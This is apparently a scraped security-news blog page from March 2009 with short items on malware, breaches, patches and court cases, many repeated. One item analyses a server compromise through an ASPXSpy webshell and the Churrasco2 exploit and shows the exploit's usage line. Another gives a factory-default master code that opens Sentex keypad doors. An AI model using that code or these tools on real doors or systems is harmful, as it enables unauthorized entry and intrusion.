The prevalence of web-based malware massively rose last year -- and the state of the economy is likely a big reason, according to an annual threat report from ScanSafe.
----------
Spot the Tiny Phishing Trick
Phishers are abusing the useful TinyURL service to hide phishing links. Here's how to spot the ruse.
----------
Apple Security Update Fixes ITunes Vulnerabilities
Update fixes a pair of security concerns, and adds support for its new line of iPod shuffles.
----------
D.C.'s top IT security official charged with bribery
Federal law enforcement officials filed bribery charges today against the District of Columbia's acting chief security officer, along with a one-time D.C. government employee who owns an IT outsourcing company that runs offshore operations in India. Both were later arraigned in federal court.
----------
The three astronauts on board the International Space Station today were forced to seek shelter in a "lifeboat" when space debris came hurtling dangerously close to the orbiting outpost.
Two American astronauts and a Russian cosmonaut took refuge in the Soyuz TMA-13 Capsule, which is what they would use if they needed to return to Earth, according to Josh Byerly, a NASA spokesman. They were in the capsule from 12:34 a.m. to 12:45 a.m. Eastern time today when they received an all-clear from Mission Control.
Mar 12,2009
Worm develops ability to disable antimalware tools, switch domains more frequently
----------
Major Cybercrime Busts Take Place In Romania
----------
Government Needs To Get Its Cybersecurity In Gear, Experts Tell Congress
Mar 10,2009
Security industry leaders agree that White House should lead revamped cybersecurity effort
----------
When web application security, Microsoft and the AV vendors all fail
I just spent some time analyzing yet another incident and I was actually shocked about how the combination of relatively weak defenses led to a system being completely compromised.The three main actors in this movie were a web application with a security vulnerability, Microsoft’s server class operating systems with an unpatched local privilege escalation vulnerability and the last line of everyone’s defense, the AV vendors.
The story started more or less like hundreds of recently seen incidents. A web application had a vulnerability that allowed a remote attacker to upload files to the server. As the files were not validated, the attacker was able to upload a .NET Webshell. This webshell is known as ASPXSpy, it’s an ASPX program that allows easy control over the compromised server. The attacker can now upload files through the browser and execute them.
However, the attacker still does not have total control over the server as the IIS service runs under an unprivileged account. This is where the local privilege escalation vulnerability comes into play. The attackers uploaded a local exploit called Churrasco2. This is a PoC created by a well known researcher Cesar Cerrudo and published back in October 2008. What makes it even worse is that it work on both Windows Server 2008 and Server 2003. The exploit creates a backdoor shell after it steals the SYSTEM token. The program’s usage description says it all:
/Churrasco/-->Usage: Churrasco2.exe ipaddress port
After this, it was game over. The attacker had a backdoor to the server running as SYSTEM. The next steps were very obvious and included installation of another Trojan as well as a keylogger.
Finally, the last line of defense, the anti-virus program, failed as well. Although the AV vendors typically include detection for exploits, it’s clear that they missed this one. I ran it past VirusTotal and the results where … well … horrible is an understatement – 0 AV programs detected this: http://www.virustotal.com/analisis/4f48b73697428888f338bf66fa1eb92a
So, what can we learn from this example? The attacks I described are in the wild and are abused. The first line of defense, in this case the web application’s security, must be made as secure as possible – secure coding standards, penetration tests and whatever else you can do are justified. As we saw from this example, other defenses failed. And the security of your web application depends only on you.
This doesn’t mean that other two actors should just sit and do nothing. Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx), I don’t think enough people know about this.
Finally, the AV vendors should be more proactive (instead of reactive) and follow exploit research developments so they can add detection for similar exploits early and protect their customers.
----------
Massive ARP spoofing attacks on web sites
----------
Russian youth organization cops to 2007 Estonian cyberattacks
Nearly two years after Estonian government sites were brought to their knees by a DDoS attack, a high-ranking official over the Russian youth group Nashi has admitted that his organization was behind the attacks. Nashi maintains that it acted without authorization from the government, but will the Russians move to punish those responsible in a tense political situation?
----------
The March 2009 release contains 3 new bulletins, 1 of which has a maximum severity of "Critical".
MS09-006 - Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
MS09-007 - Vulnerability in SChannel Could Allow Spoofing (960225)
MS09-008 - Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
We also revised bulletin MS08-052 Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), to note a revision to some of the packages associated with this bulletin (specifically 938464).
----------
Hacking iTunes Gift Cards, and an iTunes Update
Recently, several media outlets have been running a fascinating story about hackers making oodles of money selling iTunes gift cards activation codes at online auctions, supposedly after cracking the secret algorithm Apple uses to generate voucher codes for iTunes gift cards.
But a blog post published today by one of the security industry's most prominent researchers suggests that the real hack here is far simpler: The crooks are merely using stolen credit cards to purchase and resell the iTunes gift cards.
Permalink
----------
The Doghouse: Sentex Keypads
It has a master key:
Here's a fun little tip: You can open most Sentex key pad-access doors by typing in the following code:
***00000099#*
The first *** are to enter into the admin mode, 000000 (six zeroes) is the factory-default password, 99# opens the door, and * exits the admin mode (make sure you press this or the access box will be left in admin mode!)
----------
Former FBI Director calls for decentralisation of cybersecurity responsibilities
Former FBI director, Louis Freeh warns that security problems on networks are too complex for the National Security Agency (NSA) alone, to resolve more…
----------
"The French national police force, the Gendarmerie Nationale, has spoken about their migration away from the Windows platform to Linux. Estimated to have already saved the force 50 Million Euros, the migration is due to be completed on all 90,000 workstations by 2015. Of the move, Lt. Col. Guimard had this comment: '"Moving from Microsoft XP to Vista would not have brought us many advantages and Microsoft said it would require training of users. Moving from XP to Ubuntu, however, proved very easy. The two biggest differences are the icons and the games. Games are not our priority."'"
Read More...
----------
BBC buys a botnet, DDoSes security firm
Dancho Danchev: A team at the BBC's Click purchases a botnet of 22,000 malware-infected PCs, self-spams themselves on a Gmail account, then DDoS-es security company Prevx. Is this anyway to fight cybercrime?
----------
Be Careful What You Search For
March 11, 2009
Several Search Engine Optimization schemes are being used to attract search engine users to fake anti-virus web sites.
----------
CLIENT ALERT:
Musicians Lobbying For Approval Of Ticketmaster-Live Nation Merger Forget To Mention Massive Conflict Of Interest
----------
Visa: Heartland, RBS WorldPay no longer PCI compliant
Dan Kaplan March 13, 2009
Visa has removed Heartland Payment Systems and RBS WorldPay -- two payment processors that have announced massive data breaches in recent months -- from its list of service providers compliant with payment industry guidelines.
----------
Web malware, more advanced and targeted than ever
Dan Kaplan March 12, 2009
The prevalence of web-based malware massively rose last year -- and the state of the economy is likely a big reason, according to an annual threat report from ScanSafe.
----------
Spot the Tiny Phishing Trick
Phishers are abusing the useful TinyURL service to hide phishing links. Here's how to spot the ruse.
----------
Apple Security Update Fixes ITunes Vulnerabilities
Update fixes a pair of security concerns, and adds support for its new line of iPod shuffles.
----------
D.C.'s top IT security official charged with bribery
Federal law enforcement officials filed bribery charges today against the District of Columbia's acting chief security officer, along with a one-time D.C. government employee who owns an IT outsourcing company that runs offshore operations in India. Both were later arraigned in federal court.
----------
The three astronauts on board the International Space Station today were forced to seek shelter in a "lifeboat" when space debris came hurtling dangerously close to the orbiting outpost.
Two American astronauts and a Russian cosmonaut took refuge in the Soyuz TMA-13 Capsule, which is what they would use if they needed to return to Earth, according to Josh Byerly, a NASA spokesman. They were in the capsule from 12:34 a.m. to 12:45 a.m. Eastern time today when they received an all-clear from Mission Control.
Monday, March 9, 2009
Monday 03/09/09
California bill spells out what companies have to say about data breaches A co-author of California's landmark data-breach notification law has introduced a new bill that would set specific requirements on what companies have to say in breach notices. Read more...
----------
Charges beefed up against alleged Sarah Palin e-mail hacker
The University of Tennessee college student accused of illegally accessing Alaska Gov. Sarah Palin's Yahoo e-mail account was formally charged today on new fraud and obstruction-of-justice charges.
David Kernell was arraigned in U.S. District Court for the Eastern District of Tennessee, five months after a federal grand jury first handed down charges against him. He had been facing just one count of illegally accessing a protected computer, but prosecutors are now accusing him of three counts of computer fraud and one count of obstruction of justice. All four charges are felonies.
Kernell pleaded not guilty to the charges, according to court records.
----------
No more CeBIT police raids: European, Chinese companies talk on tech licensing
----------
Excel Bug Will Be Ignored on Patch Tuesday
... The company acknowledged, however, that it will not deliver a fix for an Excel flaw that attackers are now exploiting.
Microsoft didn't disclose details of the patches, other than to say which versions of Windows will be affected.
----------
Visa Backtracks on Breach Disclosure
Visa and MasterCard have probably been slow to identify the cause of a breach that they warned banks about in mid-February because they want to complete an investigation into the incident, analysts say.
However, the lack of candor sparked rampant speculation that a new, major breach had occurred, forcing Visa to later say that the warning referred to an expanded investigation of a previously known incident.
----------
Hackers update Conficker worm, evade countermeasures
The Conficker/Downadup worm managed to slither onto millions of PCs worldwide at its height, but after it initially infected a computer it only really acted to spread itself, and didn't cause further harm. Until now.
----------
Federal cybersecurity director quits, complains of NSA role
Cybersecurity chief Beckstrom resigns
Reuters - Fri Mar 6, 11:46 PM ET
NEW YORK (Reuters) - The U.S. government's director for cybersecurity resigned on Friday, criticizing the excessive role of the National Security Agency in countering threats to the country's computer systems.
----------
Google Docs Glitch Exposes Private Files
Only a few users were affected, and the problem appears to be solved.
----------
Build Security into Every Product, Coders Advised
Security experts suggest security should be "baked into" every software development project.
----------
Behind the Estonia Cyber Attacks
Radio Free Europe / Radio Liberty ran a story on Friday that we just discovered. According to the article, a Russian official has admitted that Russia was responsible for the cyber attacks on Estonia in April/May 2007. We don't have any other data to correlate this with, so we ask our readers if you know of any other independent reporting of this please let us know via our contact form.
If this story is true, it adds yet another twist to the "truth" of what happened in Estonia in 2007 and perhaps also with respect to the alleged Russian cyber attacks against Georgia last year. There is no internationally accepted formal definition of "cyber warfare" even though many in the media like to use that term freely when describing denial of service attacks, website defacements, or other activities that otherwise would be labeled as criminal behavior. I don't personally believe that any hostile activity we have seen so far in cyberspace can be labeled "warfare" but rather is either criminal or espionage related.
----------
Hypocrisy or necessity? RIAA continues filing lawsuits
---------
Swindlers using new CSS method attack eBay
Swindlers are using XSS in conjunction with the XML Binding Language (XBL), allowing elements in an HTML document to be linked to another web site. Whether the error lies with eBay or in the browser is still unknown more…
----------
McAfee Monthly Spam Report for March
Key findings include:
Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.
Replica-watch spam has taken over the number one position for holiday spam.
Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?
Putting a dollar value on productivity lost due to spam.
Download a copy here.
----------
Copying our attorney's verdict?
Ex-NFL Player Sues Over Madden NFL Games
By KARINA BROWN
LOS ANGELES (CN) - Former Cleveland Browns running back and NFL Hall of Famer Jim Brown says Electronic Arts illegally used him as a character in several versions of its Madden NFL video games.
----------
Who should Software Freedom sue on FAT32?
Microsoft owns FAT32, but it didn’t appear to pursue its rights against companies that supported FAT32 in their Linux thumb drives and consumer electronics.
Until the TomTom case. At which point Jeremy Allison of Samba says Microsoft had secret cross-licensing deals with all those other guys which violate the GPL.
So the question becomes, who should Software Freedom sue?
----------
Charges beefed up against alleged Sarah Palin e-mail hacker
The University of Tennessee college student accused of illegally accessing Alaska Gov. Sarah Palin's Yahoo e-mail account was formally charged today on new fraud and obstruction-of-justice charges.
David Kernell was arraigned in U.S. District Court for the Eastern District of Tennessee, five months after a federal grand jury first handed down charges against him. He had been facing just one count of illegally accessing a protected computer, but prosecutors are now accusing him of three counts of computer fraud and one count of obstruction of justice. All four charges are felonies.
Kernell pleaded not guilty to the charges, according to court records.
----------
No more CeBIT police raids: European, Chinese companies talk on tech licensing
----------
Excel Bug Will Be Ignored on Patch Tuesday
... The company acknowledged, however, that it will not deliver a fix for an Excel flaw that attackers are now exploiting.
Microsoft didn't disclose details of the patches, other than to say which versions of Windows will be affected.
----------
Visa Backtracks on Breach Disclosure
Visa and MasterCard have probably been slow to identify the cause of a breach that they warned banks about in mid-February because they want to complete an investigation into the incident, analysts say.
However, the lack of candor sparked rampant speculation that a new, major breach had occurred, forcing Visa to later say that the warning referred to an expanded investigation of a previously known incident.
----------
Hackers update Conficker worm, evade countermeasures
The Conficker/Downadup worm managed to slither onto millions of PCs worldwide at its height, but after it initially infected a computer it only really acted to spread itself, and didn't cause further harm. Until now.
----------
Federal cybersecurity director quits, complains of NSA role
Cybersecurity chief Beckstrom resigns
Reuters - Fri Mar 6, 11:46 PM ET
NEW YORK (Reuters) - The U.S. government's director for cybersecurity resigned on Friday, criticizing the excessive role of the National Security Agency in countering threats to the country's computer systems.
----------
Google Docs Glitch Exposes Private Files
Only a few users were affected, and the problem appears to be solved.
----------
Build Security into Every Product, Coders Advised
Security experts suggest security should be "baked into" every software development project.
----------
Behind the Estonia Cyber Attacks
Radio Free Europe / Radio Liberty ran a story on Friday that we just discovered. According to the article, a Russian official has admitted that Russia was responsible for the cyber attacks on Estonia in April/May 2007. We don't have any other data to correlate this with, so we ask our readers if you know of any other independent reporting of this please let us know via our contact form.
If this story is true, it adds yet another twist to the "truth" of what happened in Estonia in 2007 and perhaps also with respect to the alleged Russian cyber attacks against Georgia last year. There is no internationally accepted formal definition of "cyber warfare" even though many in the media like to use that term freely when describing denial of service attacks, website defacements, or other activities that otherwise would be labeled as criminal behavior. I don't personally believe that any hostile activity we have seen so far in cyberspace can be labeled "warfare" but rather is either criminal or espionage related.
----------
Hypocrisy or necessity? RIAA continues filing lawsuits
---------
Swindlers using new CSS method attack eBay
Swindlers are using XSS in conjunction with the XML Binding Language (XBL), allowing elements in an HTML document to be linked to another web site. Whether the error lies with eBay or in the browser is still unknown more…
----------
McAfee Monthly Spam Report for March
Key findings include:
Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.
Replica-watch spam has taken over the number one position for holiday spam.
Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?
Putting a dollar value on productivity lost due to spam.
Download a copy here.
----------
Copying our attorney's verdict?
Ex-NFL Player Sues Over Madden NFL Games
By KARINA BROWN
LOS ANGELES (CN) - Former Cleveland Browns running back and NFL Hall of Famer Jim Brown says Electronic Arts illegally used him as a character in several versions of its Madden NFL video games.
----------
Who should Software Freedom sue on FAT32?
Microsoft owns FAT32, but it didn’t appear to pursue its rights against companies that supported FAT32 in their Linux thumb drives and consumer electronics.
Until the TomTom case. At which point Jeremy Allison of Samba says Microsoft had secret cross-licensing deals with all those other guys which violate the GPL.
So the question becomes, who should Software Freedom sue?
Friday, March 6, 2009
Friday 03/06/09
March 2009 Advanced Notification
Posted Thursday, March 05, 2009 9:57 AM by MSRCTEAM
Hello, Bill here.
I wanted to let you know that we just posted our Advance Notification for next week’s bulletin release, scheduled for Tuesday, March 10, 2009 around 10 a.m. Pacific Standard Time.
As part of this month’s security bulletin release process, we will issue three security bulletins – one rated ‘Critical’ and two rated ‘Important’ – to address vulnerabilities in Microsoft Windows. Depending on the bulletin, a restart may be required.
----------
Microsoft: No patch for Excel zero-day flaw next week
----------
Twitter spoofing fix fails in UK and Germany
Twitter's claim to have fixed the spoofing vulnerability is found to be untrue in the UK and Germany more…
----------
Risky MIME sniffing in Internet Explorer
Uploading images is a standard requirement for any Web 2.0 application, but some features of Internet Explorer need to be carefully handled, otherwise a hole can open up and facilitate cross-site scripting attacks on site visitors more…
----------
Firefox: most vulnerabilities, but quickly patched
Secunia has published its security report for 2008, saying that 115 vulnerabilities were eliminated from Firefox in 2008: more than those found in Internet Explorer, Safari and Opera put together more…
----------
Microsoft has confirmed that users will be able to remove its IE8 browser, as well as several other integrated applications, from Windows 7. Jack Mayo, a group program manager on the Windows team, listed in a blog post the applications that can be switched off. They include Internet Explorer 8, Fax and Scan, handwriting recognition, Windows DVD Maker, Windows Gadget Platform, Windows Media Player, Windows Media Center, Windows Search, and XPS Viewer and Services. He explained that the files associated with those applications and features are not actually deleted from the hard drive. The public beta of Windows 7 does not include the ability to 'kill' said apps. But a pirated copy of Windows 7 Build 7048 includes the new removal options, and has been leaked on the Internet.
----------
'Napping' datacenters cut energy use by 75%
Christopher Jablonski: Researchers at the University of Michigan announced a plan to save up to 75 percent of the energy that power-hungry datacenters consume by putting idle servers to sleep when they're not in use.
----------
Illinois Sheriff Says Craigslist Is 'Largest Source of Prostitution'
CHICAGO (CN) - Craigslist openly and unabashedly facilitates prostitution, Cook County Sheriff Thomas Dart claims in state court. He filed a lawsuit to shut down the online classified site's "erotic services" section, calling it a "convenient clearinghouse for pimps, prostitutes and patrons that enables sellers to advertise and buyers to peruse discreetly."
----------
Unpatched PDF bug poses growing threat, say researchers An unpatched bug in popular PDF viewing and editing applications is more dangerous than first thought, according to security researchers who created exploits that sidestep Adobe Systems' defensive advice. Read more...
----------
Botnet ringleader gets four years in prison for stealing data from PCs
March 5, 2009 (Computerworld) The first person to be charged under federal wiretap statutes for using a botnet to steal data and commit fraud was sentenced to four years in prison this week.
John Schiefer, a 27-year-old Los Angeles resident, was also ordered to pay $2,500 in fines. The sentence was handed down Wednesday by U.S. District Judge Howard Matz in federal court in Los Angeles.
Schiefer, a former security researcher, agreed to plead guilty in November 2007 to stealing usernames, passwords and financial data from more than 250,000 compromised systems, then installing adware on the massive botnet that he and several accomplices set up.
----------
Mahalo CEO defends IT staffer who ran botnet before being hired
Search engine exec says he hopes to offer John Schiefer a new job after sentence is up
----------
NYPD faces ID theft risk after data stolen from pension fund
----------
Catbird tightens security of virtual machines
Catbird is upgrading its virtual security software platform to better track virtual machines as they replicate themselves and to make sure the proper security policies follow them wherever they go.
The product, VMShield 2.0, includes V-Tracker, technology that uses more attributes to define virtual machines, making it more likely that VMs will be tracked accurately when they create other versions of themselves.
VMShield then makes sure that the proper policies are applied to all instances of the virtual machine. The policy checks not only pertain to attributes of the virtual machine but also to the physical machine it migrates to.
Posted Thursday, March 05, 2009 9:57 AM by MSRCTEAM
Hello, Bill here.
I wanted to let you know that we just posted our Advance Notification for next week’s bulletin release, scheduled for Tuesday, March 10, 2009 around 10 a.m. Pacific Standard Time.
As part of this month’s security bulletin release process, we will issue three security bulletins – one rated ‘Critical’ and two rated ‘Important’ – to address vulnerabilities in Microsoft Windows. Depending on the bulletin, a restart may be required.
----------
Microsoft: No patch for Excel zero-day flaw next week
----------
Twitter spoofing fix fails in UK and Germany
Twitter's claim to have fixed the spoofing vulnerability is found to be untrue in the UK and Germany more…
----------
Risky MIME sniffing in Internet Explorer
Uploading images is a standard requirement for any Web 2.0 application, but some features of Internet Explorer need to be carefully handled, otherwise a hole can open up and facilitate cross-site scripting attacks on site visitors more…
----------
Firefox: most vulnerabilities, but quickly patched
Secunia has published its security report for 2008, saying that 115 vulnerabilities were eliminated from Firefox in 2008: more than those found in Internet Explorer, Safari and Opera put together more…
----------
Microsoft has confirmed that users will be able to remove its IE8 browser, as well as several other integrated applications, from Windows 7. Jack Mayo, a group program manager on the Windows team, listed in a blog post the applications that can be switched off. They include Internet Explorer 8, Fax and Scan, handwriting recognition, Windows DVD Maker, Windows Gadget Platform, Windows Media Player, Windows Media Center, Windows Search, and XPS Viewer and Services. He explained that the files associated with those applications and features are not actually deleted from the hard drive. The public beta of Windows 7 does not include the ability to 'kill' said apps. But a pirated copy of Windows 7 Build 7048 includes the new removal options, and has been leaked on the Internet.
----------
'Napping' datacenters cut energy use by 75%
Christopher Jablonski: Researchers at the University of Michigan announced a plan to save up to 75 percent of the energy that power-hungry datacenters consume by putting idle servers to sleep when they're not in use.
----------
Illinois Sheriff Says Craigslist Is 'Largest Source of Prostitution'
CHICAGO (CN) - Craigslist openly and unabashedly facilitates prostitution, Cook County Sheriff Thomas Dart claims in state court. He filed a lawsuit to shut down the online classified site's "erotic services" section, calling it a "convenient clearinghouse for pimps, prostitutes and patrons that enables sellers to advertise and buyers to peruse discreetly."
----------
Unpatched PDF bug poses growing threat, say researchers An unpatched bug in popular PDF viewing and editing applications is more dangerous than first thought, according to security researchers who created exploits that sidestep Adobe Systems' defensive advice. Read more...
----------
Botnet ringleader gets four years in prison for stealing data from PCs
March 5, 2009 (Computerworld) The first person to be charged under federal wiretap statutes for using a botnet to steal data and commit fraud was sentenced to four years in prison this week.
John Schiefer, a 27-year-old Los Angeles resident, was also ordered to pay $2,500 in fines. The sentence was handed down Wednesday by U.S. District Judge Howard Matz in federal court in Los Angeles.
Schiefer, a former security researcher, agreed to plead guilty in November 2007 to stealing usernames, passwords and financial data from more than 250,000 compromised systems, then installing adware on the massive botnet that he and several accomplices set up.
----------
Mahalo CEO defends IT staffer who ran botnet before being hired
Search engine exec says he hopes to offer John Schiefer a new job after sentence is up
----------
NYPD faces ID theft risk after data stolen from pension fund
----------
Catbird tightens security of virtual machines
Catbird is upgrading its virtual security software platform to better track virtual machines as they replicate themselves and to make sure the proper security policies follow them wherever they go.
The product, VMShield 2.0, includes V-Tracker, technology that uses more attributes to define virtual machines, making it more likely that VMs will be tracked accurately when they create other versions of themselves.
VMShield then makes sure that the proper policies are applied to all instances of the virtual machine. The policy checks not only pertain to attributes of the virtual machine but also to the physical machine it migrates to.
Subscribe to:
Posts (Atom)